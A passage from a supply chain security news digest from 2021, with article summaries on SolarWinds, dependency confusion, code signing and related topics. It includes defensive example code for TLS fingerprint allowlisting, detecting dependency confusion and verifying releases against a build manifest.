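    return ",".join([str(version), join(ciphers), join(extensions), join(curves), join(point_formats)])


def ja3_hash(version, ciphers, extensions, curves, point_formats):
    """JA3 fingerprint: MD5 of the JA3 string (MD5 is an identifier here, not a security primitive)."""
    return hashlib.md5(ja3_string(version, ciphers, extensions, curves, point_formats).encode("ascii")).hexdigest()


# Constructed baseline of approved clients and their ClientHello parameters
# (version, cipher suites, extensions, supported groups, point formats). In practice
# these come from observing known-good software on a reference host.
APPROVED = {
    "corp-updater": (771, [4865, 4866, 4867, 49195, 49199],
                     [0, 23, 65281, 10, 11, 35, 16, 5, 13, 51, 45, 43], [29, 23, 24], [0]),
    "browser": (771, [4865, 4867, 4866, 49195, 49199, 52393],
                [0, 23, 65281, 10, 11, 16, 5, 13, 18, 51, 45, 43, 27], [29, 23, 24, 25], [0]),
}


def build_allowlist(approved):
    """Map each approved fingerprint hash to the application name it belongs to."""
    return {ja3_hash(*hello): name for name, hello in approved.items()}


def find_unknown_clients(flows, allowlist):
    """Return (host, sni, ja3) for every flow whose client fingerprint is not in the baseline."""
    unknown = []
    for flow in flows:
        fingerprint = ja3_hash(*flow["hello"])
        if fingerprint not in allowlist:
            unknown.append((flow["host"], flow["sni"], fingerprint))
    return unknown


# Constructed traffic records from one build host. The first is corp-updater with GREASE
# values inserted (as a real client would); the second matches nothing in the baseline.
FLOWS = [
    {"host": "build-01", "sni": "updates.example.com",
     "hello": (771, [0x0a0a, 4865, 4866, 4867, 49195, 49199],
               [0x1a1a, 0, 23, 65281, 10, 11, 35, 16, 5, 13, 51, 45, 43], [0x2a2a, 29, 23, 24], [0])},
    {"host": "build-01", "sni": "cdn.example.net",
     "hello": (771, [49171, 49172, 156, 157], [0, 10, 11, 13, 35], [23, 24], [0])},
]

if __name__ == "__main__":
    allowlist = build_allowlist(APPROVED)
    for host, sni, fingerprint in find_unknown_clients(FLOWS, allowlist):
        print(f"ALERT {host} -> {sni}: unknown TLS client fingerprint {fingerprint}")
```

An unknown fingerprint is a lead, not a verdict: a legitimate software update can change a client's hello, so the baseline needs re-capturing whenever approved software is upgraded.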

Ref - CSO Online 

_______________________________________________________________________________________

(Oct 21, 2021)

Supply chain attacks are a bigger risk than ever

When it comes to defending against supply chain attacks, the majority of organizations feel confident in their ability to stay safe. However, more than half (53 percent) are more vulnerable than they realize, a report from security firm Acronis suggests. Based on a survey of 3,600 IT managers and remote employees working at SMBs, the report asserts that most companies are under a barrage of cyberattacks, but do not deploy industry-standard protection measures.

Ref - ITProportal 

_______________________________________________________________________________________

(Oct 21, 2021)

Microsoft, Intel, and Goldman Sachs to lead new TCG Work Group to tackle supply chain security challenges

Trusted Computing Group (TCG) has today announced a new workgroup that will define how TCG technologies can be implemented to address supply chain security challenges. Led by representatives from Microsoft, Intel, and Goldman Sachs, the workgroup will create guidance that defines, implements, and upholds security standards for the entire supply chain.

Ref - Dark Reading 

_______________________________________________________________________________________

(Oct 21, 2021)

Securing the open-source software supply chain

CVE matching and remediation information enable an organization to build a secure supply chain tailored to its unique needs and policies. For example, one foundational cybersecurity practice is to consult CVE databases and scores regularly to guard against the risk of using vulnerable packages and binaries in applications.

Ref - IBM 

_______________________________________________________________________________________

(Oct 21, 2021)

How organizations can tackle supply chain attacks

Organizations and their information security teams can protect their networks from such attacks by ensuring that infrastructures that do not need to be directly connected to the Internet are not connected. Lindy Cameron, CEO of the National Cyber Security Centre (NCSC), explained what companies need to do.

 
_______________________________________________________________________________________

(Oct 20, 2021)

Supply chain attacks are the hacker's new favorite weapon

Several major incidents during the past 12 months have demonstrated the large-scale consequences supply chain attacks can have. Some of these attacks have been identified because they've been on such a large scale. But there are means of supply chain compromise that are far less likely to draw attention but can be very effective. And a more tightly focused campaign might be harder to detect.

Ref - ZDNet

_______________________________________________________________________________________

(Oct 20, 2021)

House approves bill to strengthen IT supply chain following SolarWinds hack

The House on Wednesday approved legislation to strengthen software and information technology supply chains at the Department of Homeland Security (DHS) and to help protect against attacks similar to last year’s SolarWinds hack. The DHS Software Supply Chain Risk Management Act, sponsored by Rep. Ritchie Torres (D-N.Y.) passed the lower chamber overwhelmingly by a vote of 412-2.

Ref - The Hill 

_______________________________________________________________________________________

(Oct 19, 2021)

Protect your open source project from supply chain attacks

The year 2021 has also been the year of supply chain security solutions. While there’s still plenty of work to be done and plenty of room for improvement in existing solutions, there are preventative controls users can apply to their projects to harden the supply chain and prevent compromise. Google Open Source has provided some recommendations along with the SLSA framework and OpenSSF Scorecards rubric.

Ref - Google Blog 

_______________________________________________________________________________________

(Oct 18, 2021)

How CIOs can prepare for supply chain security issues heading into 2022

In addition to the logistical nightmare, an attack on the supply chain can incur millions of dollars in recovery costs. From 2020 to 2021, there was a 10% increase in the average cost of a data breach, bringing the average total cost to $4.24 million. Using tactics like ransomware and phishing, cyberattacks have also increased both in severity and frequency this year.

Ref - Forbes 

_______________________________________________________________________________________

(Oct 18, 2021)

Third-party attacks are increasing, but third-party risk management is failing

Over the last year, the number of companies reporting an increase in budget for third-party security risk management has increased from 81% to 91% – but that hasn’t translated into a meaningful improvement in tackling the risk. The main problem is it is still frequently treated as a GRC issue; that is, an annual perhaps paper-based audit for each third-party vendor. This does not reflect the continuous and ongoing nature of third-party risk.


_______________________________________________________________________________________

(Oct 18, 2021)

Defending against the threat of software supply chain attacks

In order to minimize the risk of supply chain attacks, businesses should therefore aim to narrow their exposed perimeter, primarily by reducing the number of external suppliers they work with. As Toyota does with its hardware supply chain, the focus should shift to relying on fewer suppliers with whom a relationship of deep trust and understanding is built.

Ref - TechRadar 

_______________________________________________________________________________________

(Oct 17, 2021)

Enterprises are scrambling to deploy zero trust security

Ericom’s first Zero Trust Market Dynamics Survey assesses the market’s perception of the zero-trust security framework, explores organizations’ plans for adoption and implementation, and identifies key issues that inhibit their moves to zero trust. Approximately 1,300 security and risk professionals participated in Ericom’s July 2021 survey.

Ref - VentureBeat 

_______________________________________________________________________________________

(Oct 15, 2021)

Supply chain risk – It’s the moment of truth

Today’s supply chain risk programs just aren’t keeping pace with the rapidly changing business and technology environment. Assessments are largely manual, relying on spreadsheet-based, point-in-time questionnaires. When self-reporting assessments are issued, confidence in the results is low. Assessment frequency is also insufficient.

Ref - BizJournals 

_______________________________________________________________________________________

(Oct 15, 2021)

Vulnerabilities in most public cloud containers could lead to supply chain attacks

According to the Unit 42 Cloud Threat Report 2H 2021 report, 96% of third-party container applications deployed in cloud infrastructure contain known vulnerabilities. And 63% of third-party code templates used in building cloud infrastructure contained insecure configurations.

Ref - CPO Magazine 

_______________________________________________________________________________________

(Oct 15, 2021)

Shoring up cybersecurity in critical infrastructure and the nation's defense supply chain

In 2020, the government established the cybersecurity maturity model certification (CMMC) as a verification process for defense industrial base (DIB) contractors within the DOD’s supply chain. The CMMC ensures that DIB companies implement cybersecurity practices and procedures that adequately protect federal contract information (FCI) and controlled unclassified information (CUI) within their networks.

_______________________________________________________________________________________

(Oct 13, 2021)

Mandating a zero-trust approach for software supply chains

In the wake of the SolarWinds attack last year, President Biden issued an executive order in May advocating for mandatory software bills of materials, or SBOMs, to increase software transparency and counter supply-chain attacks. Sounil Yu, CISO at JupiterOne, discusses software bills of materials (SBOMs) and the need for a shift in thinking about securing software supply chains.

Ref - ThreatPost 

_______________________________________________________________________________________

(Oct 12, 2021)

Risks posed by your third parties and supply chain

Most respondents to the PwC 2022 Global Digital Trust Insights Survey seem to have trouble seeing their third-party risks - risks obscured by the complexities of their business partnerships and vendor/supplier networks. Only 40% of survey respondents say they thoroughly understand the risk of data breaches through third parties, using formal enterprise-wide assessments.

Ref - PwC 
_______________________________________________________________________________________

(Oct 12, 2021)

Over 90% of firms suffered supply chain breaches last year

Some 93% of global organizations have suffered a direct breach due to weaknesses in their supply chains over the past year, according to BlueVoyant. The cybersecurity services company polled 1200 IT and procurement leaders responsible for supply chain and cyber-risk management from global companies with 1,000+ employees to compile its report: Managing Cyber Risk Across the Extended Vendor Ecosystem.


_______________________________________________________________________________________

(Oct 12, 2021)

Software supply chain breaches are ‘staggeringly high’

According to a new report from BlueVoyant, software supply chain weaknesses have become pervasive in the enterprise. 97% of firms have been negatively impacted by a supply chain cybersecurity breach, with 93% admitting that they have suffered a direct cybersecurity breach because of weaknesses in their supply chain.

Ref - VentureBeat 

_______________________________________________________________________________________

(Oct 11, 2021)

More urgency is needed for supply chain security during holidays

Supply chain security issues only become bigger threats during the holiday season, according to Kyle Rice, CTO at SAP National Security Services (NS2). The holiday season is particularly ripe for nefarious threat actors because IT staffs are often reduced, employees are more distracted and businesses experience surges.

Ref - TechTarget 

_______________________________________________________________________________________

(Oct 11, 2021)

SolarWinds-style supply chain attacks 'set to increase'

The hacking of the complex supply chains of major corporations is likely to increase as agents try to replicate the chaos of the SolarWinds cyberattack on the United States, the head of Britain's cyber security has said. Such devastating attacks were likely to continue for years, alongside ransomware threats and the continued upheaval caused by the Covid-19 pandemic.


_______________________________________________________________________________________

(Oct 11, 2021)

The anatomy of an attack against a cloud supply pipeline

During the red team exercise, researchers took guidance from the strategies and techniques used by the attackers behind the SolarWinds Orion supply chain attack, in order to emulate a real-world threat and assess the security practices against known attacker techniques.


_______________________________________________________________________________________

(Oct 11, 2021)

How secure is your supply chain

Supply chain management is no longer about procurement alone. With the rise of supply chain-based attacks, supply chain management, risk management, and IT are coming closer together and forming supply chain cyber resilience.

Ref - ITWeb
 
_______________________________________________________________________________________

(Oct 8, 2021)

Software supply chains: an introductory guide

Because software is made up of third-party component parts, attacks have shifted to target the supply chain. The attack against SolarWinds is maybe the best example, where a complex effort against multiple components enabled access to the company’s network and application monitoring platform—a system used by over 30,000 organizations.

Ref - Sonatype 

_______________________________________________________________________________________

(Oct 8, 2021)

Supply chain attacks are now more costly than ever

Cyberattacks that exploit suppliers and partners to access a company's data are now more costly than ever, a new report from security firm Kaspersky suggests. According to the paper, the average financial impact of a supply chain attack against an enterprise reached $1.4 million this year, making it the most expensive type of incident.

Ref - ITProPortal 

_______________________________________________________________________________________

(Oct 8, 2021)

Data breach reports rise as supply chain attacks surge

"Although supply chain attacks only count as a single attack, they impact multiple organizations and the individuals whose data is stored by them," ITRC says. "Sixty entities were impacted by 23 third-party or supply chain attacks, including eight attacks that were reported in previous quarters."


_______________________________________________________________________________________

(Oct 7, 2021)

Why are MSPs prime targets for cybercriminals and APTs?

In recent years, supply chain attacks have gone from rare to increasingly common, and the payoff for threat actors of all stripes that successfully compromise a Managed Service Provider (MSP) far outweighs either the investment or risk.

Ref - SentinelOne 

_______________________________________________________________________________________

(Oct 6, 2021)

Using cloud-native buildpacks to address software supply chain security requirements 

There are numerous ways to cause a software supply chain attack. Generally speaking, as software components move up the deployment pipeline, they are authenticated in order to work. These components should be able to access various internal pieces that comprise the host infrastructure.

Ref - InfoQ
 
_______________________________________________________________________________________

(Oct 5, 2021)

Open-source software and supply chain security

"The software supply chain is fragile," according to Forrester’s report "The Top Security Technology Trends to Watch, 2021". This challenge is not breaking news for open-source advocates. How do you secure a supply chain for a product that has no physical form, no box to lock, and is created in an environment where anyone can contribute to it?

Ref - RedHat 

_______________________________________________________________________________________

(Oct 5, 2021)

Anatomy of a supply chain attack

Using the Codecov security breach as an example, threat intelligence experts explained the timeline of various supply chain events. This included how it took approximately two months for the breach to be discovered, another two weeks for the first indicator to be shared (an IP address), and two more weeks for the second round of indicators to be published.


_______________________________________________________________________________________

(Oct 5, 2021)

Supply chain risk matters when it comes to cybersecurity for next-gen 911

Senate Bill 2754 provides $10 billion to help facilitate the transition from legacy public safety networks to the NG911 standard by distributing grants to local agencies responsible for 911. But the supply chain hole related to this is glaring: It has no provisions to Buy American or even consider supply chain risk.

Ref - The Hill 

_______________________________________________________________________________________

(Oct 4, 2021)

Securing government supply chains with critical access management

Incorrect trust relationships form when governments treat their third parties and supply chain like employees. Granting a third party the same access with the same level of security and trust as a government employee is opening up the door to a compromised network. The reality is that this fails to fully secure third-party access because organizations do not directly control third parties or supply chains.

Ref - GovTech 

_______________________________________________________________________________________

(Oct 4, 2021)

Google paying more to developers to make projects more secure against supply chain risks

Google is backing a new project from the Linux Foundation to the tune of $1 million that aims to bolster the security of critical open-source projects. Rather than a bug bounty, Google's latest investment – a part of its $10 billion pledge to President Biden's cybersecurity push – seeks to address potential security issues before they become bugs through improvements in hardening software against attacks. 

Ref - ZDNet 

_______________________________________________________________________________________

(Oct 1, 2021)

Supply chain security: mapping the key threats to business

Many hackers will tailor their cyber-attack methods according to whereabouts in the supply chain ecosystem they are targeting. For instance, attackers may use different tricks to target different business sectors such as Manufacturing, Logistics, or Retail. By applying diligence and best practices, and understanding upstream and downstream threats and dependencies, businesses can safeguard their operational integrity and build trust with other businesses that sit throughout their supply chains.

Ref - Teiss 

_______________________________________________________________________________________

(Oct 1, 2021)

Unwanted gift: ransomware and supply chain attacks

Even a cursory glance at the recent Kaseya attack gives security professionals a window into why this unfortunate combination is such a prevalent threat. The attack generated a ransom demand of over $70 million, which Kaseya has denied paying. However, regardless of whether a ransom payment was made, REvil nevertheless received an immense return on their investment by gaining access to networks belonging to over one thousand organizations, including 100 pre-schools in New Zealand.


_______________________________________________________________________________________

(Sept 30, 2021)

Using vendor management to defend against supply chain attacks

The second quarter of 2021 brought another increase for supply chain attacks, with the number of incidents growing by 19% to 32. The 59 supply chain attacks detected through June fell just behind the 70 malware-related compromises in H1 2021. So, it is predicted that third-party risks stemming from supply chain attacks and other incidents will surpass malware as the third most common source of breaches by the end of the year.


_______________________________________________________________________________________

(Sept 30, 2021)

Shades of SolarWinds attack malware found in new 'Tomiris' backdoor

Researchers at Kaspersky said they had detected a new backdoor they have dubbed "Tomiris," which has multiple attributes that suggest a link to "Sunshuttle," a second-stage malware that DarkHalo used in its SolarWinds campaign. This includes the programming language used to develop Tomiris, its obfuscation and persistence mechanisms, and the general workflow of the two malware samples.

Ref - Dark Reading 

_______________________________________________________________________________________

(Sept 30, 2021)

Securing the supply chain has become a much bigger issue

Most high-level executives are highly confident in the cybersecurity of their supply chain, despite lacking a comprehensive understanding of the essential components that make a software supply chain secure, a new report has claimed. In its “Global C-suite security survey” report, CloudBees found 95% of respondents described their software supply chains as secure, while 93% said they were ready to handle a ransomware attack or a similar threat against their supply chain. 

Ref - TechRadar 

_______________________________________________________________________________________

(Sept 30, 2021)

Supply chain emerging as a cloud security threat

Matt Chiodi, CSO of public cloud at Palo Alto Networks, explained that supply chain flaws in the cloud are difficult to detect because of the massive number of building blocks that go into even a basic cloud-native application. The report highlights how vulnerabilities and misconfigurations can quickly snowball within the context of the cloud software supply chain, and called for organizations to “shift security left.”

 
_______________________________________________________________________________________

(Sept 29, 2021)

Leveraging threat intelligence to tackle supply chain vulnerabilities

The first component of the supply chain attack begins with the identification of a vulnerable supplier who is digitally connected to one or more organizations with highly valuable data. Next, the target organization is infiltrated, valuable data is exfiltrated, and lateral movement to connected consumer organizations is executed as the secondary phase of the attack; the cycle then repeats itself through as many exploitable connections as are available.


_______________________________________________________________________________________

(Sept 29, 2021)

‘Tomiris’ backdoor linked to SolarWinds malware

Researchers have discovered a campaign delivering a previously unknown backdoor they’re calling Tomiris. Notably, Tomiris has a number of similarities to the Sunshuttle second-stage malware (aka GoldMax) that was distributed by Nobelium (aka DarkHalo). The targeting of the Tomiris campaign shows a number of overlaps with Kazuar, a backdoor linked to the Turla APT, first reported by Palo Alto in 2017 (though its development goes back to 2015).

Ref - Threat Post 

_______________________________________________________________________________________

(Sept 28, 2021)

How one red team exercise averted a new SolarWinds-style attack

An undisclosed company engaged Unit 42’s services to break into its cloud software development environment. The Unit 42 red team took advantage of misconfigurations in the development environment to take control of the customer’s software development process in a similar fashion to how a Russia-linked advanced persistent threat (APT) group was able to penetrate SolarWinds’ platform to introduce a tainted code update.


_______________________________________________________________________________________

(Sept 28, 2021)

How nation-state attackers like NOBELIUM are changing cybersecurity

Numerous organizations were impacted by the NOBELIUM attacks. In this supply chain attack, hackers were able to access the SolarWinds code, slip malicious code into a piece of the software, and use the vendor’s legitimate software updates to spread their malware to customer systems. Successful attacks gave NOBELIUM hackers high-level permissions on the downstream compromised systems.

Ref - Microsoft 

_______________________________________________________________________________________

(Sept 28, 2021)

Cloud companies are looking to tighten their defenses against supply chain attacks

Part of the reason most cloud environments can be exploited is that they're complex and difficult to secure. Securing them is understandably not a simple task, and vulnerabilities and misconfigurations can snowball: with patience and the right skills, attackers can exploit access to service providers and leave those providers' customers vulnerable to attack.

Ref - ZDNet 

_______________________________________________________________________________________

(Sept 28, 2021)

New cloud threat research on software supply chain attacks

For their latest Cloud Threat Report, the Unit 42 team analyzed data from a variety of public data sources and also executed a red team exercise on the software development environment of a large SaaS provider (a customer of Palo Alto Networks) at their request. Their findings indicate that many organizations may have a false sense of security regarding their cloud infrastructure and protection procedures.


_______________________________________________________________________________________

(Sept 28, 2021)

Understanding supply chain attack, and what to do about it

Supply chain attacks will increase in 2021. Part of this expansion comes from increased application environment complexity: companies embrace the need for agile and adaptable supply chains that are resistant to future disruptions. After all, broadening the number of connected apps and services helps enterprises better navigate changing market conditions.


_______________________________________________________________________________________

(Sept 24, 2021)

Supply chain and ransomware threats drove 60% increase in Global Cyber Intelligence sharing among financial firms

FS-ISAC announced that global cyber intelligence sharing among its member financial firms increased by 60% in the period from August 2020 to August 2021, driven by supply chain and ransomware threats. Large scale threats resulted in record-breaking peaks of intelligence sharing across all regions: North America; Latin America; Europe, the UK, the Middle East, and Africa; and the Asia Pacific.


_______________________________________________________________________________________

(Sept 24, 2021)

Supply chain risks in open source projects

With the rapid growth in the use of open-source projects for development activities, it is crucial to safeguard against supply chain attacks that arrive through compromised or vulnerable dependencies. Before directly importing open source dependencies in the package manager, it is worth reviewing their associated security vulnerabilities. This can be achieved manually by analyzing all open source components for any known security vulnerabilities, or it can be done using automated software composition analysis (SCA) solutions.

 
_______________________________________________________________________________________

(Sept 23, 2021)

Here's a fix for open source supply chain attacks

Vendors are evolving beyond their original areas of core competency, extending their functional base horizontally in order to deliver a more comprehensive, integrated developer experience. From version control to monitoring, databases to build systems, every part of an application development workflow needs to be better and more smoothly integrated.


_______________________________________________________________________________________

(Sept 22, 2021)

Advanced software supply chain attacks spike

Dependency confusion incidents were the most prevalent software supply chain attacks in the previous year, followed by typosquatting and malicious source code injections. Dependency confusion involves figuring out the names of a particular company’s internal packages and then publishing a package with the same name to a public registry, with a higher semantic version than the internal package already in use, so that a package manager configured to consult both registries prefers the attacker’s copy.

Ref - SCMagazine 
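The following Go program, added here as an editor's illustration and not code from the article or from any package manager, models the resolution rule that dependency confusion exploits and the scoping rule that defeats it. The package names (acme-billing-core, acme-auth-client) and the registry index are constructed; the resolver and the semver comparison are deliberately minimal stand-ins for what npm, pip or NuGet do when a name is present in both a private feed and a public one.

```go
package main

import (
	"fmt"
	"sort"
	"strconv"
	"strings"
)

// Package is one candidate version of a named package, as listed by a registry.
type Package struct {
	Name     string
	Version  string
	Registry string // "private" (the company's own feed) or "public" (npm, PyPI, ...)
}

// compareSemver orders MAJOR.MINOR.PATCH numerically and returns -1, 0 or 1.
// Pre-release and build suffixes are dropped; that is enough for this check.
func compareSemver(a, b string) int {
	pa := strings.Split(strings.SplitN(a, "-", 2)[0], ".")
	pb := strings.Split(strings.SplitN(b, "-", 2)[0], ".")
	for i := 0; i < 3; i++ {
		var x, y int
		if i < len(pa) {
			x, _ = strconv.Atoi(pa[i])
		}
		if i < len(pb) {
			y, _ = strconv.Atoi(pb[i])
		}
		if x < y {
			return -1
		}
		if x > y {
			return 1
		}
	}
	return 0
}

// resolve models the package manager's choice among candidates for one name.
// scoped == false: the naive "highest version from any registry wins" rule
// that dependency confusion abuses. scoped == true: names the company owns are
// only ever taken from the private registry, which is the fix.
func resolve(name string, index []Package, internal map[string]bool, scoped bool) (Package, bool) {
	var best Package
	found := false
	for _, c := range index {
		if c.Name != name {
			continue
		}
		if scoped && internal[name] && c.Registry != "private" {
			continue
		}
		if !found || compareSemver(c.Version, best.Version) > 0 {
			best, found = c, true
		}
	}
	return best, found
}

// findConfusable reports every internal name that a naive resolver would
// satisfy from the public registry instead of the private one.
func findConfusable(index []Package, internal map[string]bool) []string {
	var hits []string
	for name := range internal {
		priv, okPriv := resolve(name, index, internal, true)
		naive, okNaive := resolve(name, index, internal, false)
		if okPriv && okNaive && naive.Registry == "public" {
			hits = append(hits, fmt.Sprintf("%s: private %s loses to public %s", name, priv.Version, naive.Version))
		}
	}
	sort.Strings(hits)
	return hits
}

// Constructed sample data: two internal packages and a public registry in which
// an attacker has published a squat of one of them with an inflated version.
var internalNames = map[string]bool{"acme-billing-core": true, "acme-auth-client": true}

var sampleIndex = []Package{
	{Name: "acme-billing-core", Version: "1.4.2", Registry: "private"},
	{Name: "acme-billing-core", Version: "99.0.0", Registry: "public"}, // attacker's squat
	{Name: "acme-auth-client", Version: "2.0.1", Registry: "private"},
	{Name: "left-pad", Version: "1.3.0", Registry: "public"},
}

func main() {
	for _, h := range findConfusable(sampleIndex, internalNames) {
		fmt.Println("CONFUSABLE", h)
	}
}
```

The practical equivalent of scoped resolution is to bind every internal name (or namespace) to the private registry in the package manager's configuration and to reserve those names on the public registry, so that a higher public version can never win the comparison.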

_______________________________________________________________________________________

(Sept 22, 2021)

How software supply chain attacks happen and how to mitigate them

The primary software supply chain attack vector boils down to exploitable vulnerabilities residing in reused code, linked libraries, or third-party executables. Software reuse is on the rise, and many developers depend on open source software, which is susceptible to known and unknown vulnerabilities. While open-source projects issue patches in a reasonable amount of time, many organizations never install them.

Ref - Toolbox 

_______________________________________________________________________________________

(Sept 21, 2021)

Managing cyber risk through integrated supply chains

It is important to assess potential threat sources and inherent risks across the supply chain, leveraging industry good practice. Look closely at the attack paths that could be taken to undermine the operations. Supply chain/partner organizations should be obliged to manage the handling of the data in line with any agreed good practice standard.

 
_______________________________________________________________________________________

(Sept 21, 2021)

Securing the Edge in the supply chain

Edge computing is becoming a necessity in supply chain management as organizations want the ability to precisely track the status, location, and expected arrival time of components and other deliveries. Because of the large amounts of data generated by the supply chain and its wide-ranging attack surface, organizations need to consider cybersecurity layers to secure the edge.


_______________________________________________________________________________________

(Sept 21, 2021)

Cybersecurity awareness must include the entire web supply chain

Third-party vendors have become the norm rather than the exception in web and mobile applications, and they often handle the bulk of user-facing functionality. Through those third-party assets, malicious actors can use the web to track, target, and deliver malware payloads to users.

Ref - Forbes

_______________________________________________________________________________________

(Sept 20, 2021)

Agencies seek comments on supply chain security of critical software

The departments of Commerce and Homeland Security are looking to incorporate comments on cybersecurity design details into a report on the supply of information and communications technology required by executive order. Areas highlighted for comment in Monday’s Federal Register notice tracked closely with those identified in the executive order and relate to cross-cutting supply-chain concerns.

Ref - NextGov 

_______________________________________________________________________________________

(Sept 20, 2021)

Businesses are failing to protect software supply chains

A new report from the identity management company Venafi, based on a poll of more than 1,000 IT and software development professionals, finds that the overwhelming majority (94 percent) believe there should be “clear consequences” for software vendors that fail to protect the integrity of their software build pipelines.


_______________________________________________________________________________________

(Sept 17, 2021)

Software supply chain attack explained

Software supply chain attacks are just one type of supply chain attack, but there are also different subtypes of software supply chain attack that security-conscious organizations need to understand. The National Institute of Standards and Technology (NIST) identifies six points in the software life cycle at which such attacks can occur: design, development and production, distribution, acquisition and deployment, maintenance, and disposal.

Ref - Tessian

_______________________________________________________________________________________

(Sept 17, 2021)

SushiSwap's MISO launchpad hit by $3 million supply chain attack

SushiSwap's chief technology officer says the company's MISO platform has been hit by a software supply chain attack. CTO Joseph Delong announced that an auction on MISO launchpad had been hijacked via a supply chain attack. An "anonymous contractor" with the GitHub handle AristoK3 and access to the project's code repository had pushed a malicious code commit that was distributed on the platform's front end.


_______________________________________________________________________________________

(Sept 16, 2021)

Azure zero-day flaws highlight lurking supply-chain risk

Four zero-day vulnerabilities in Open Management Infrastructure (OMI), the management agent used in Azure on Linux, show that OMI is a significant security blind spot. Collectively dubbed OMIGOD, the flaws demonstrate how hidden components carry hidden risk, and they affect thousands of Azure customers and millions of endpoints.


_______________________________________________________________________________________

(Sept 15, 2021)

Why open-source software supply chain management is worse than you think

The seventh annual State of the Software Supply Chain Report has revealed that a majority of respondents use an ad hoc approach to software supply chain management for most parts of the process, except for remediation and inventory. The analysis revealed that 29% of popular open-source projects contain at least one known security vulnerability compared to only 6.5% of less popular OSS projects. 


_______________________________________________________________________________________

(Sept 15, 2021)

Supply chain attacks against the open-source ecosystem soar by 650%

The last year has seen a massive rise in the number of software supply chain attacks aimed at upstream public repositories, a new report has revealed. According to Sonatype’s annual State of the Software Supply Chain Report, more than 12,000 such attacks were recorded, a 650% increase over the previous year, which had itself shown a 430% increase over the year before.

Ref - PortSwigger 

_______________________________________________________________________________________

(Sept 15, 2021)

Execs concerned about software supply chain security, but not taking action

According to ENISA, supply chain attacks, such as SolarWinds, Codecov, and Kaseya, are expected to increase by a factor of four in 2021. Executives are clearly much more concerned about their vulnerability to software supply chain attacks and aware of the urgent need for action.


_______________________________________________________________________________________

(Sept 15, 2021)

Supply chain attacks on open source repositories are reaching new highs

There has been a whopping 650% year-over-year increase in supply chain attacks aimed at upstream open-source public repositories, according to a new report. Interestingly, despite the risk, cybersecurity company Sonatype’s seventh annual State of the Software Supply Chain Report notes strong growth in the supply and demand of open-source software.

Ref - TechRadar 

_______________________________________________________________________________________

(Sept 15, 2021)

What the Kaseya attack can teach local governments about preventing third-party data breaches

There are ways to minimize, or at the very least mitigate, the risks associated with supply chain attacks. In a recent report on the state of third-party security, 44% of organizations surveyed said they had experienced a third-party data breach within the last 12 months. Of those organizations, 74% attributed the breach to giving too much privileged access to third parties.


_______________________________________________________________________________________

(Sept 15, 2021)

Who bears the brunt of supply chain attacks?

A survey by Venafi shows that most executives are not taking action that will drive change. While 94% of executives believe there should be clear consequences for software vendors that fail to protect the integrity of their software build pipelines, most have done little to change the way they evaluate the security of the software they purchase or the assurances they demand from software providers.

Ref - TechHQ 

_______________________________________________________________________________________

(Sept 13, 2021)

Ways to improve cyber resilience against ransomware, supply chain attacks

There are some common vital steps we can all take to protect sensitive data. This includes a renewed focus on database security, collaborating across the private/public sector, enabling continuous monitoring, mitigation and testing, training and retaining cybersecurity experts, and when thinking about security assuming that agencies will come under attack.

Ref - GCN

_______________________________________________________________________________________
 
(Sept 13, 2021)

Can advanced code-signing help end supply chain attacks?

The software company signs every piece of code with its private key, and recipients check the signature with the corresponding public key. Unfortunately, once attackers have access to the code-signing key, either by stealing it or by gaining access to a build server and getting the legitimate signing process to sign their code, they can easily disguise their malware: the signature verifies, so it looks like a vendor release. They need only one piece of signed code to gain back-door access to networks, and there’s a vast range of potential victims. 
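The Go program below is an added illustration of that point, not code from the article or from any vendor's signing pipeline. It signs a constructed artifact with Ed25519, shows that a signature-only check accepts a build signed with the same (stolen) key, and then adds a second control that the article does not describe but that a practitioner would reach for: a manifest of build digests published through a channel the signing key does not control. The artifact contents, the manifest and the key are all constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Release is what reaches the customer: the artifact bytes and a detached
// signature over their SHA-256 digest.
type Release struct {
	Artifact  []byte
	Signature []byte
}

func digest(b []byte) []byte {
	h := sha256.Sum256(b)
	return h[:]
}

// Sign is the build pipeline's step: the vendor's private key signs the digest.
func Sign(priv ed25519.PrivateKey, artifact []byte) Release {
	return Release{Artifact: artifact, Signature: ed25519.Sign(priv, digest(artifact))}
}

// VerifySignature is where most update clients stop: "does the vendor's public
// key validate this?" It cannot tell a legitimate build from one signed with a
// stolen key, which is the weakness the article describes.
func VerifySignature(pub ed25519.PublicKey, r Release) bool {
	return ed25519.Verify(pub, digest(r.Artifact), r.Signature)
}

// Manifest is a set of hex digests of builds the vendor actually produced,
// published through a channel the signing key does not control (an assumption
// for this example: think of a release page or transparency log on separate
// infrastructure). An attacker holding only the key cannot add entries to it.
type Manifest map[string]bool

// VerifyRelease demands both a valid signature and a digest the vendor has
// independently attested. The stolen-key build passes the first and fails the second.
func VerifyRelease(pub ed25519.PublicKey, m Manifest, r Release) error {
	if !VerifySignature(pub, r) {
		return errors.New("signature does not verify")
	}
	if !m[hex.EncodeToString(digest(r.Artifact))] {
		return errors.New("signature valid, but digest is not in the published build manifest")
	}
	return nil
}

// demo walks through the scenario with constructed artifacts and a fresh key.
// It returns whether the signature-only check accepts the trojaned build and
// what the manifest-backed check says about it.
func demo() (naiveAccepts bool, strictErr error, err error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return false, nil, err
	}
	good := []byte("vendor-agent-2.1.0.tar.gz (constructed stand-in for a real build)")
	m := Manifest{hex.EncodeToString(digest(good)): true}
	if e := VerifyRelease(pub, m, Sign(priv, good)); e != nil {
		return false, nil, e // the legitimate build must pass both checks
	}
	// The attacker has exfiltrated priv and signs a build with an implant.
	trojaned := Sign(priv, []byte("vendor-agent-2.1.0.tar.gz + implant (constructed)"))
	return VerifySignature(pub, trojaned), VerifyRelease(pub, m, trojaned), nil
}

func main() {
	naive, strict, err := demo()
	if err != nil {
		panic(err)
	}
	fmt.Println("signature-only check accepts stolen-key build:", naive)
	fmt.Println("manifest-backed check:", strict)
}
```

The design point is that a signature proves possession of the key, not that the build came out of the intended pipeline; keeping the key in an HSM and requiring a second, independently published record of what was built limits what a stolen key or a subverted build server can achieve.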


_______________________________________________________________________________________

(Sept 10, 2021)

Securing the supply chain in the age of hybrid work

In today’s connected world, everyone—from device manufacturers to consumers—has a responsibility to improve cybersecurity by working together. Companies must seek out vendors that can provide security assurance, as well as realize the need to upgrade their security posture to maintain customer trust and prevent cyber disasters. The more informed an organization is about its devices, the stronger its supply chain security posture will be.

Ref - SDCExecutive 

_______________________________________________________________________________________

(Sept 8, 2021)

Security at scale in the open-source supply chain

